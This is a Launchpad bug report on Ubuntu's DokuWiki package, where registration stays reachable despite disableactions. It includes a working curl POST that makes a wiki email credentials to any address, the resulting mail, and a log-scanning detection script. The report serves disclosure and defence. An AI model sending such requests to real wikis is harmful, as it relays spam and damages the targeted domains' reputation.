Public bug reported: Dokuwiki 0.0.20220731.a-2 in 24.04 and 24.10 has a serious bug.
It should be possible to completely disable registration and password reset with this line in local.php: `$conf['disableactions'] = 'register,resendpwd'`. Indeed this works for normal web access. However, there is a bug with this code and it is being actively exploited. The following request results in an email sent to the email address provided:

```
curl -d "login=BADBUG&fullname=FUBAR&email=tar...@attack.com&save=1&sectok=" -H 'Content-Type: application/x-www-form-urlencoded' -X POST 'https://dokuwiki.example.com/doku.php?id=start&do=register'
```

This sends an email to the supplied attack address with content:

```
Hi FUBAR!

Here is your userdata for Debian DokuWiki at https://dokuwiki.example.com/

Login : badbug
Password : ducversao+60

--
This mail was generated by DokuWiki at
https://dokuwiki.example.com/
```

This can be used to anonymously attack a given email address, or trash the reputation of a domain that is running the Ubuntu version of Dokuwiki. The dokuwiki maintainers have tested this vulnerability and report that it has been fixed for a while.
References:
https://forum.dokuwiki.org/d/22878-dokuwiki-used-to-relay-spam
https://github.com/dokuwiki/dokuwiki/issues/4407

ProblemType: Bug
DistroRelease: Ubuntu 24.10
Package: dokuwiki 0.0.20220731.a-2 [modified: usr/share/dokuwiki/inc/template.php var/lib/dokuwiki/lib/plugins/config/_test/WriterTest.php var/lib/dokuwiki/lib/plugins/config/core/Setting/Setting.php var/lib/dokuwiki/lib/plugins/config/core/Setting/SettingArray.php var/lib/dokuwiki/lib/plugins/config/core/Writer.php var/lib/dokuwiki/lib/tpl/dokuwiki/tpl_footer.php var/lib/dokuwiki/lib/tpl/dokuwiki/tpl_header.php]
ProcVersionSignature: Ubuntu 6.11.0-1009.10-aws 6.11.11
Uname: Linux 6.11.0-1009-aws x86_64
ApportVersion: 2.30.0-0ubuntu4
Architecture: amd64
CasperMD5CheckResult: unknown
CloudArchitecture: x86_64
CloudBuildName: server
CloudID: aws
CloudName: aws
CloudPlatform: ec2
CloudRegion: eu-north-1
CloudSerial: 20240927
CloudSubPlatform: metadata (http://169.254.169.254)
Date: Mon Feb 24 14:31:11 2025
Ec2Architecture: x86_64
Ec2Imageid: ami-08eb150f611ca277f
Ec2Instancetype: t3.micro
Ec2Region: eu-north-1
PackageArchitecture: all
ProcEnviron:
 LANG=C.UTF-8
 PATH=(custom, no user)
 SHELL=/bin/bash
 TERM=xterm-256color
SourcePackage: dokuwiki
UpgradeStatus: Upgraded to oracular on 2025-02-24 (0 days ago)

** Affects: dokuwiki (Ubuntu)
     Importance: Undecided
         Status: New

** Tags: amd64 apport-bug cloud-image oracular

https://bugs.launchpad.net/bugs/2099903
Title: dokuwiki sends emails to arbitrary email addresses
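Until the package is patched, an administrator who has set `disableactions` can at least detect this abuse from the web server's access log: a DokuWiki instance that honours the setting should never be answering POST requests to `do=register` or `do=resendpwd`. The following Python script is an added example, not part of the bug report or of DokuWiki itself; it assumes Apache/nginx combined log format, and the log lines it scans are constructed sample data rather than real traffic.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format). Two POSTs to the
# register action from one client, one GET that merely renders the form,
# and one POST to the password-reset action from a second client.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2025:14:02:11 +0000] "POST /doku.php?id=start&do=register HTTP/1.1" 200 1432 "-" "curl/8.5.0"
203.0.113.7 - - [24/Feb/2025:14:02:12 +0000] "POST /doku.php?id=start&do=register HTTP/1.1" 200 1432 "-" "curl/8.5.0"
198.51.100.4 - - [24/Feb/2025:14:03:40 +0000] "GET /doku.php?id=start HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Feb/2025:14:03:45 +0000] "GET /doku.php?id=start&do=register HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Feb/2025:14:05:01 +0000] "POST /doku.php?id=start&do=resendpwd HTTP/1.1" 200 900 "-" "python-requests/2.31"
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD path PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The actions the administrator disabled via $conf['disableactions'].
DISABLED_ACTIONS = {"register", "resendpwd"}


def parse_line(line):
    """Parse one combined-format line; return a dict with the DokuWiki 'do' action, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = parse_qs(urlsplit(rec["path"]).query)
    rec["action"] = query.get("do", [None])[0]
    rec["status"] = int(rec["status"])
    return rec


def find_disabled_action_posts(log_text, disabled=DISABLED_ACTIONS):
    """Return records for POSTs that invoke an action the config says is disabled.

    GETs are ignored on purpose: fetching the form page is harmless, the mail
    is only sent when the form data is POSTed (the save=1 request in the report).
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["action"] in disabled:
            hits.append(rec)
    return hits


def summarize(hits):
    """Count suspicious POSTs per (client ip, action) for alerting or blocking."""
    return Counter((h["ip"], h["action"]) for h in hits)


if __name__ == "__main__":
    for (ip, action), n in summarize(find_disabled_action_posts(SAMPLE_LOG)).items():
        print(f"{ip} POSTed do={action} {n} time(s) although the action is disabled")
```

Run it against the real log (for example `open('/var/log/apache2/access.log').read()`) instead of `SAMPLE_LOG`; any hit is a request the configuration should have rejected, and the counts per client identify who is relaying mail through the wiki.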